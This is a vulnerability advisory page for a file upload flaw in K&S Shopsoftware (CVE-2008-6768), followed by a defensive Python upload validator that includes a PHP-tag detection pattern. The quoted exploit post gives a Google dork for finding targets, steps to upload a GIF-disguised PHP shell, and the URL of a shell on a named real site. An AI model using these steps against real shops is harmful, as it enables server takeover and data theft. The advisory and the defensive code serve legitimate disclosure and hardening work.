Shopsystem-Forum K&S Shopsystem 'admin/editor/images.php' Unrestricted File Upload Vulnerability

Vulnerability ID: 1117074 | Vulnerability type: Other
Published: 2008-12-17 | Updated: 2009-04-30
CVE ID: CVE-2008-6768 | CNNVD-ID: CNNVD-200904-530
Platform: PHP | CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/7500
https://cxsecurity.com/issue/WLB-2009050082
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-530
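|Vulnerability details
admin/editor/images.php in K&S Shopsoftware contains an unrestricted file upload vulnerability. A remote attacker can execute arbitrary code by first uploading a file with an executable extension and then accessing it through a direct request to the file in images/upload/.
|Exploit (EXP)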
## Script Name: Shopsysteme (new version oscommerce)

## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro)  :) 

## Author: mNt

## File Upload Bug

## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Results 191 - 200 of about 32,900 for Powered by K&S Media Concept - Shopsysteme (0.51 seconds)]

## Use:

http://www.example.com/

after add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php

File uploaded php shell

after in url: http://www.example.com/images/upload/mNt.php

Attention: Shell Code İn GIF89;a

## Live demo: http://www.trampleandfetish.de/admin/editor/image.php

## PHP Shell Address: http://www.trampleandfetish.de/images/upload/data.php

## Thanks: DelİDolU, HeDgEs, Scarface, Cih@t, Suskun Dünyam, Lodos2005, Sabotage

## web Site: www.rootingforced.org || www.rootingforced.com || www.rootingforced.net

# milw0rm.com [2008-12-17]
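
The upload script accepts a file with an executable extension, and the advisory's note about a GIF header shows why checking only the first bytes of the file would not have helped. The following is an added example, not code from K&S Shopsoftware or from the advisory: a Python sketch of the server-side checks an image uploader needs, reusable as an audit of an existing upload directory. The allowed types, the name pattern and all function names are assumptions, and the name rule goes beyond the page by also rejecting double extensions and path separators.

```python
import os
import re
import secrets

# Assumption: the image editor only needs these types; names are <stem>.<ext>.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.(gif|jpe?g|png)", re.I)
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}
# Secondary signal only: short tags (<? and <?=) are not matched, to avoid
# false positives on compressed image data.
PHP_TAG = re.compile(rb"<\?php", re.I)

def check_upload(filename, data):
    """Return the reasons to reject an upload; an empty list means accept."""
    reasons = []
    match = NAME_RE.fullmatch(filename)
    if match is None:
        # Rejects .php, double extensions (x.php.gif) and path separators.
        reasons.append("name is not <stem>.<allowed image extension>")
    elif not data.startswith(MAGIC[match.group(1).lower()]):
        reasons.append("content does not match the extension's magic bytes")
    if PHP_TAG.search(data):
        # A valid image header proves nothing about the rest of the file.
        reasons.append("contains a PHP open tag")
    return reasons

def stored_name(filename):
    """Server-chosen name for an accepted upload; keeps only the extension."""
    ext = NAME_RE.fullmatch(filename).group(1).lower()
    return secrets.token_hex(16) + "." + ext

def audit_dir(path):
    """Run the same checks over files already present in an upload directory."""
    findings = {}
    for entry in sorted(os.listdir(path)):
        full = os.path.join(path, entry)
        if os.path.isfile(full):
            with open(full, "rb") as fh:
                reasons = check_upload(entry, fh.read())
            if reasons:
                findings[entry] = reasons
    return findings

if __name__ == "__main__":
    # Constructed samples, not taken from the advisory.
    print(check_upload("sample.php", b"GIF89a<?php echo 1; ?>"))
    print(check_upload("photo.gif", b"GIF89a" + bytes(32)))
```

These checks are one layer; the upload directory should also be served with script execution disabled, so that a file that slips through is returned as data rather than run.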
|References

Source: XF
Name: shopsystemexclusivplus-images-file-upload(47424)
Link: http://xforce.iss.net/xforce/xfdb/47424
Source: BID
Name: 32888
Link: http://www.securityfocus.com/bid/32888
Source: MILW0RM
Name: 7500
Link: http://www.milw0rm.com/exploits/7500
Source: SECUNIA
Name: 33212
Link: http://secunia.com/advisories/33212
Source: OSVDB
Name: 51210
Link: http://osvdb.org/51210